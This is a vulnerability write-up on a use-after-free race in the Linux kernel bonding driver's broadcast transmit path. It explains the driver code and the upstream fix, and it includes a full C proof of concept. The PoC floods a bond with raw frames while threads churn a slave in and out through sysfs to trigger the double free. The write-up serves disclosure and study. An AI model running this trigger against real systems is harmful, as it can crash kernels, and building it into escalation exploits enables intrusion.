Introduction
Linux offers a way to aggregate multiple network interfaces, physical or virtual, so that they behave as a single logical NIC. The bonding driver handles all of that work. It is present in all major distros, and this bug is exploitable on the ones that allow user namespaces for unprivileged users, such as RedHat or Fedora; that is, it’s reachable from any code path that can send packets out of the bonding device.
How does this work ?
The idea is to have one “Master” interface and multiple “Slave” interfaces that are attached to the master. This can be achieved in many ways, as documented on docs.kernel.org. One of these ways is:
Step I: Loading the bonding driver + dummy for slave interfaces
system("modprobe dummy 2>/dev/null || true");
system("modprobe bonding 2>/dev/null || true");
Step II: Creating interfaces
system("ip link add " NIC_SLAVE0 " type dummy 2>/dev/null");
system("ip link add " NIC_SLAVE1 " type dummy 2>/dev/null");
system("ip link add " NIC_SLAVE2 " type dummy 2>/dev/null");
system("ip link add " NIC_SLAVE3 " type dummy 2>/dev/null");
// ...
system("ip link add " BOND_DEV " type bond 2>/dev/null");
Step III: Creating the bonding + adding slaves
printf("[*] Configuring bond (mode=broadcast)...\n");
run("ip link set " BOND_DEV " type bond mode broadcast"); // [1] <-------
printf("[*] Enslaving permanent slaves...\n");
system("ip link set " NIC_SLAVE0 " master " BOND_DEV);
system("ip link set " NIC_SLAVE1 " master " BOND_DEV);
system("ip link set " NIC_SLAVE2 " master " BOND_DEV);
system("ip link set " NIC_SLAVE3 " master " BOND_DEV);
// ...
Step IV: Bringing them up
system("ip link set " BOND_DEV " up");
system("ip link set " NIC_SLAVE0 " up");
system("ip link set " NIC_SLAVE1 " up");
system("ip link set " NIC_SLAVE2 " up");
system("ip link set " NIC_SLAVE3 " up");
So, here we have 1 Master which is BOND_DEV and 4 Slaves NIC_SLAVE{0,1,2,3}.
Bonding Modes
At [1] (Step III), I set the bond to broadcast mode. Why? First off, when creating a bond there are, as you would imagine, many parameters, such as:
- max_bonds: which specifies the maximum number of bondings per driver.
- packets_per_slave: specifies number of packets to transmit through a slave before moving to the next one (effective in load-balance style mode).
- and many more relative to a mode.
Mode is another parameter that determines the behaviour of the bond, and there are 7 of them. The default is balance-rr (balance round-robin), which transmits packets in sequential order from the first available slave through the last and provides load balancing. The others are active-backup, balance-xor, broadcast, 802.3ad, balance-tlb and balance-alb. Broadcast mode, as its name suggests, sends every packet through all of the slave interfaces.
The Broadcast Transmit Path
Let’s dive into its implementation:
Upon sending packets through the bond, bond_start_xmit() [2] is called:
// drivers/net/bonding/bond_main.c
static const struct net_device_ops bond_netdev_ops = {
.ndo_init = bond_init,
.ndo_uninit = bond_uninit,
.ndo_open = bond_open,
.ndo_stop = bond_close,
.ndo_start_xmit = bond_start_xmit, // [2]
// [...]
.ndo_add_slave = bond_enslave,
.ndo_del_slave = bond_release,
.ndo_fix_features = bond_fix_features,
// [...]
};
bond_start_xmit() hands the packet to __bond_start_xmit(), which dispatches on the bonding mode:
static netdev_tx_t __bond_start_xmit(struct sk_buff *skb, struct net_device *dev)
{
struct bonding *bond = netdev_priv(dev);
if (bond_should_override_tx_queue(bond) &&
!bond_slave_override(bond, skb))
return NETDEV_TX_OK;
// [...]
switch (BOND_MODE(bond)) { // <------------
case BOND_MODE_ROUNDROBIN:
return bond_xmit_roundrobin(skb, dev);
case BOND_MODE_ACTIVEBACKUP:
return bond_xmit_activebackup(skb, dev);
case BOND_MODE_8023AD:
if (bond_should_broadcast_neighbor(skb, dev))
return bond_xmit_broadcast(skb, dev, false);
fallthrough;
case BOND_MODE_XOR:
return bond_3ad_xor_xmit(skb, dev);
case BOND_MODE_BROADCAST: // [3]
return bond_xmit_broadcast(skb, dev, true);
// [...]
At [3], it calls bond_xmit_broadcast() for the broadcasting mode BOND_MODE_BROADCAST:
// drivers/net/bonding/bond_main.c
/* in broadcast mode, we send everything to all or usable slave interfaces.
* under rcu_read_lock when this function is called.
*/
static netdev_tx_t bond_xmit_broadcast(struct sk_buff *skb,
struct net_device *bond_dev,
bool all_slaves)
{
struct bonding *bond = netdev_priv(bond_dev);
struct bond_up_slave *slaves;
bool xmit_suc = false;
bool skb_used = false;
int slaves_count, i;
if (all_slaves)
slaves = rcu_dereference(bond->all_slaves);
else
slaves = rcu_dereference(bond->usable_slaves);
slaves_count = slaves ? READ_ONCE(slaves->count) : 0;
for (i = 0; i < slaves_count; i++) {
struct slave *slave = slaves->arr[i]; // [4]
struct sk_buff *skb2;
if (!(bond_slave_is_up(slave) && slave->link == BOND_LINK_UP))
continue;
if (bond_is_last_slave(bond, slave)) {
skb2 = skb;
skb_used = true;
} else {
skb2 = skb_clone(skb, GFP_ATOMIC);
if (!skb2) {
net_err_ratelimited("%s: Error: %s: skb_clone() failed\n",
bond_dev->name, __func__);
continue;
}
}
if (bond_dev_queue_xmit(bond, skb2, slave->dev) == NETDEV_TX_OK)
xmit_suc = true;
}
The implementation has an optimization: instead of cloning the skb for every slave, it clones it for every slave except the last one and sends the original skb on the last slave, so that the original gets consumed/freed by that final transmit. (As you may know, each clone is a separate sk_buff that shares the packet data and holds its own reference on it.)
The Bug
The original commit, "net: bonding: fix use-after-free in bond_xmit_broadcast()", describes the bug as follows:
In the Linux kernel, the following vulnerability has been resolved:
net: bonding: fix use-after-free in bond_xmit_broadcast()
bond_xmit_broadcast() reuses the original skb for the last slave
(determined by bond_is_last_slave()) and clones it for others.
Concurrent slave enslave/release can mutate the slave list during
RCU-protected iteration, changing which slave is "last" mid-loop.
This causes the original skb to be double-consumed (double-freed).
Replace the racy bond_is_last_slave() check with a simple index
comparison (i + 1 == slaves_count) against the pre-snapshot slave
count taken via READ_ONCE() before the loop. This preserves the
zero-copy optimization for the last slave while making the "last"
determination stable against concurrent list mutations.
Root Cause
There are two data structures involved here, and that’s where the trouble starts:
- slaves->arr[] (at [4]): an array snapshot of the slaves, taken under RCU. The xmit path iterates this array.
- bond->dev->adj_list.lower: a live linked list of “lower” devices. bond_is_last_slave() reads its tail to decide who is “last.”
These two structures are supposed to describe the same set of slaves. Most of the time they do. The bug is that they are not updated atomically with respect to each other.
The Race
Upon deleting a slave:
.ndo_del_slave = bond_release,
bond_release() is called:
// drivers/net/bonding/bond_main.c
/* A wrapper used because of ndo_del_link */
int bond_release(struct net_device *bond_dev, struct net_device *slave_dev)
{
return __bond_release_one(bond_dev, slave_dev, false, false);
}
bond_release() forwards to __bond_release_one(), which, among other things, does the following in order:
1. bond_upper_dev_unlink() — calls list_del_rcu() on the adj_list entry. The live adj_list.lower no longer contains the removed slave.
2. bond_update_slave_arr() — allocates a new array, walks the slaves, builds a new snapshot. This may sleep (kzalloc).
3. rcu_assign_pointer(bond->all_slaves, new_arr) — only now does the snapshot the xmit path sees actually change.
Between step 1 and step 3 there is a window — small, but real, and stretched out further by the allocation in step 2. During that window, if a transmit runs:
- slaves->arr still contains the old snapshot. Say [P0, P1, P2, P3, P4, P5(RC)], where RC is the slave being removed.
- bond_last_slave(bond) reads the live adj_list, sees that RC is gone, and returns P4 as the tail.
The broadcast loop then plays out like this:
i=P0: bond_is_last_slave(P0)? no → skb_clone()
i=P1: bond_is_last_slave(P1)? no → skb_clone()
i=P2: bond_is_last_slave(P2)? no → skb_clone()
i=P3: bond_is_last_slave(P3)? no → skb_clone()
i=P4: bond_is_last_slave(P4)? YES → use original skb // skb consumed here
i=P5: bond_is_last_slave(P5)? no → skb_clone(<freed skb>) // UAF

The original skb gets consumed by P4 because the live list returns P4 as the tail. But the loop continues on to RC (P5), and on that iteration we reach back into the skb that just got freed and try to clone it. KASAN screams.

Full PoC
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <signal.h>
#include <errno.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <net/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <arpa/inet.h>
#define BOND_DEV "bond_uaf"
#define PERM_SLAVE0 "dummy_p0"
#define PERM_SLAVE1 "dummy_p1"
#define PERM_SLAVE2 "dummy_p2"
#define PERM_SLAVE3 "dummy_p3"
/* RC is added LAST so it sits at adj_list tail — it is the removal target. */
#define RACE_SLAVE "dummy_rc"
#define SYSFS_SLAVES "/sys/class/net/" BOND_DEV "/bonding/slaves"
#define TEST_DURATION_S 30
/* ----------------------------------------------------------------- globals */
/*
 * State shared between main(), the signal handler and the worker threads.
 *
 * All three are _Atomic rather than plain/volatile:
 *   - g_stop   is set by main() and by the signal handler and polled by every
 *              worker loop; volatile alone gives no inter-thread guarantees.
 *   - g_pkts   is incremented by the sender thread and read by main().
 *   - g_races  is incremented by BOTH race threads concurrently, so a plain
 *              `g_races++` would be a data race that loses updates.
 * With an _Atomic type, `x++`, `x = 1` and plain reads are atomic operations,
 * so the code using these variables does not need to change.
 */
static _Atomic int g_stop = 0;            /* non-zero once shutdown is requested */
static _Atomic unsigned long g_pkts = 0;  /* frames pushed into the bond */
static _Atomic unsigned long g_races = 0; /* release/enslave iterations performed */
/* ------------------------------------------------------------------ helpers */
/*
 * Run a shell command through system() and report any failure on stderr.
 *
 * cmd: command line handed to the shell.
 *
 * system() returns a wait status, not an exit code, so the status is decoded
 * before it is printed: a command that exits with code 1 is reported as
 * "exited 1" (the raw status would read 256). Failure to launch the shell and
 * death by signal are reported separately. Nothing is printed on success.
 */
static void run(const char *cmd)
{
	int status = system(cmd);

	if (status == -1) {
		/* The child process could not be created or waited for. */
		fprintf(stderr, " [!] '%s' could not be run: %s\n", cmd, strerror(errno));
		return;
	}

	if (WIFEXITED(status)) {
		int code = WEXITSTATUS(status);

		if (code != 0)
			fprintf(stderr, " [!] '%s' exited %d\n", cmd, code);
	} else if (WIFSIGNALED(status)) {
		fprintf(stderr, " [!] '%s' killed by signal %d\n", cmd, WTERMSIG(status));
	}
}
/*
 * Write `entry` to the bond's sysfs slaves file (SYSFS_SLAVES).
 *
 * Returns 0 when the file could be opened and write() reported at least one
 * byte written, -1 otherwise.
 */
static int sysfs_slave_write(const char *entry)
{
	const int sysfs_fd = open(SYSFS_SLAVES, O_WRONLY);
	ssize_t written;

	if (sysfs_fd < 0)
		return -1;

	written = write(sysfs_fd, entry, strlen(entry));
	close(sysfs_fd);

	if (written <= 0)
		return -1;
	return 0;
}
/* ------------------------------------------------------------------- setup */
static void setup_interfaces(void)
{
printf("[*] Loading modules (dummy, bonding)...\n");
system("modprobe dummy 2>/dev/null || true");
system("modprobe bonding 2>/dev/null || true");
printf("[*] Creating interfaces...\n");
run("ip link add " PERM_SLAVE0 " type dummy 2>/dev/null");
run("ip link add " PERM_SLAVE1 " type dummy 2>/dev/null");
run("ip link add " PERM_SLAVE2 " type dummy 2>/dev/null");
run("ip link add " PERM_SLAVE3 " type dummy 2>/dev/null");
run("ip link add " RACE_SLAVE " type dummy 2>/dev/null");
run("ip link add " BOND_DEV " type bond 2>/dev/null");
printf("[*] Configuring bond (mode=broadcast)...\n");
run("ip link set " BOND_DEV " type bond mode broadcast");
/* Add permanent slaves first so they sit at the front of adj_list. */
printf("[*] Enslaving permanent slaves...\n");
run("ip link set " PERM_SLAVE0 " master " BOND_DEV);
run("ip link set " PERM_SLAVE1 " master " BOND_DEV);
run("ip link set " PERM_SLAVE2 " master " BOND_DEV);
run("ip link set " PERM_SLAVE3 " master " BOND_DEV);
/* Add RACE_SLAVE last → it becomes adj_list tail → bond_last_slave(). */
printf("[*] Enslaving race slave (will be tail of adj_list)...\n");
run("ip link set " RACE_SLAVE " master " BOND_DEV);
printf("[*] Bringing interfaces up...\n");
run("ip link set " BOND_DEV " up");
run("ip link set " PERM_SLAVE0 " up");
run("ip link set " PERM_SLAVE1 " up");
run("ip link set " PERM_SLAVE2 " up");
run("ip link set " PERM_SLAVE3 " up");
run("ip link set " RACE_SLAVE " up");
}
static void teardown_interfaces(void)
{
printf("\n[*] Tearing down interfaces...\n");
/* Ensure race slave is released before deleting. */
sysfs_slave_write("-" RACE_SLAVE);
system("ip link del " BOND_DEV " 2>/dev/null || true");
system("ip link del " PERM_SLAVE0 " 2>/dev/null || true");
system("ip link del " PERM_SLAVE1 " 2>/dev/null || true");
system("ip link del " PERM_SLAVE2 " 2>/dev/null || true");
system("ip link del " PERM_SLAVE3 " 2>/dev/null || true");
system("ip link del " RACE_SLAVE " 2>/dev/null || true");
}
/* Signal handler: request shutdown by raising the global stop flag. */
static void sigint_handler(int sig)
{
	(void)sig; /* the signal number is not needed */
	g_stop = 1;
}
/*
 * Sender thread: floods the bond with raw Ethernet frames until g_stop is set.
 * Each sendto() on the bond reaches bond_start_xmit() → bond_xmit_broadcast().
 *
 * arg is unused; the return value is always NULL. If the packet socket cannot
 * be created or the bond's interface index cannot be resolved, the error is
 * printed and the thread exits without sending anything.
 *
 * Only sends that the kernel accepted are counted in g_pkts, so the progress
 * line reflects frames that actually entered the transmit path. The first
 * sendto() failure is reported once; later failures are retried silently.
 */
static void *thread_send(void *arg)
{
	(void)arg;

	int sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
	if (sock < 0) {
		perror("[-] socket(AF_PACKET)");
		return NULL;
	}

	/* Resolve the bond's interface index for the link-layer address below. */
	struct ifreq ifr;
	memset(&ifr, 0, sizeof(ifr));
	snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", BOND_DEV);
	if (ioctl(sock, SIOCGIFINDEX, &ifr) < 0) {
		perror("[-] SIOCGIFINDEX");
		close(sock);
		return NULL;
	}

	/*
	 * Minimal valid-looking Ethernet frame with a broadcast destination.
	 * Note that it is the bond's broadcast *mode*, not the destination MAC,
	 * that routes every frame through bond_xmit_broadcast().
	 */
	uint8_t frame[64];
	memset(frame, 0, sizeof(frame));
	memset(frame + 0, 0xff, 6);                    /* dst: broadcast */
	frame[6] = 0xde; frame[7] = 0xad;              /* src MAC */
	frame[8] = 0xbe; frame[9] = 0xef;
	frame[10] = 0x13; frame[11] = 0x37;
	frame[12] = 0x08; frame[13] = 0x00;            /* EtherType: IPv4 */
	memset(frame + 14, 0x41, sizeof(frame) - 14);  /* payload filler */

	struct sockaddr_ll sll = {
		.sll_family = AF_PACKET,
		.sll_protocol = htons(ETH_P_ALL),
		.sll_ifindex = ifr.ifr_ifindex,
		.sll_halen = ETH_ALEN,
	};
	memset(sll.sll_addr, 0xff, ETH_ALEN);

	int send_error_reported = 0;
	while (!g_stop) {
		ssize_t sent = sendto(sock, frame, sizeof(frame), 0,
				      (struct sockaddr *)&sll, sizeof(sll));
		if (sent < 0) {
			/* Keep hammering, but do not count a frame that never left. */
			if (!send_error_reported) {
				perror("[-] sendto");
				send_error_reported = 1;
			}
			continue;
		}
		g_pkts++;
	}

	close(sock);
	return NULL;
}
/* ------------------------------------------------------- Thread: race slave */
/*
 * Race thread: until g_stop is set, repeatedly releases RACE_SLAVE from the
 * bond and enslaves it again through the sysfs slaves file, bumping g_races
 * once per release/enslave pair. The results of the sysfs writes are ignored.
 *
 * arg is unused; the return value is always NULL.
 */
static void *thread_race(void *arg)
{
	(void)arg;

	for (;;) {
		if (g_stop)
			break;

		sysfs_slave_write("-" RACE_SLAVE);
		sysfs_slave_write("+" RACE_SLAVE);
		g_races++;
	}

	/* Issue one last release on the way out. */
	sysfs_slave_write("-" RACE_SLAVE);
	return NULL;
}
/* ---------------------------------------------------------------------- main */
int main(void)
{
signal(SIGINT, sigint_handler);
signal(SIGTERM, sigint_handler);
setup_interfaces();
pthread_t t_send, t_race0, t_race1;
pthread_create(&t_send, NULL, thread_send, NULL);
pthread_create(&t_race0, NULL, thread_race, NULL);
pthread_create(&t_race1, NULL, thread_race, NULL);
for (int elapsed = 0; elapsed < TEST_DURATION_S && !g_stop; elapsed++) {
sleep(1);
printf("\r[*] t=%2ds | pkts: %-12lu | race iters: %-10lu",
elapsed + 1, g_pkts, g_races);
fflush(stdout);
}
g_stop = 1;
printf("\n");
pthread_join(t_send, NULL);
pthread_join(t_race0, NULL);
pthread_join(t_race1, NULL);
teardown_interfaces();
return 0;
}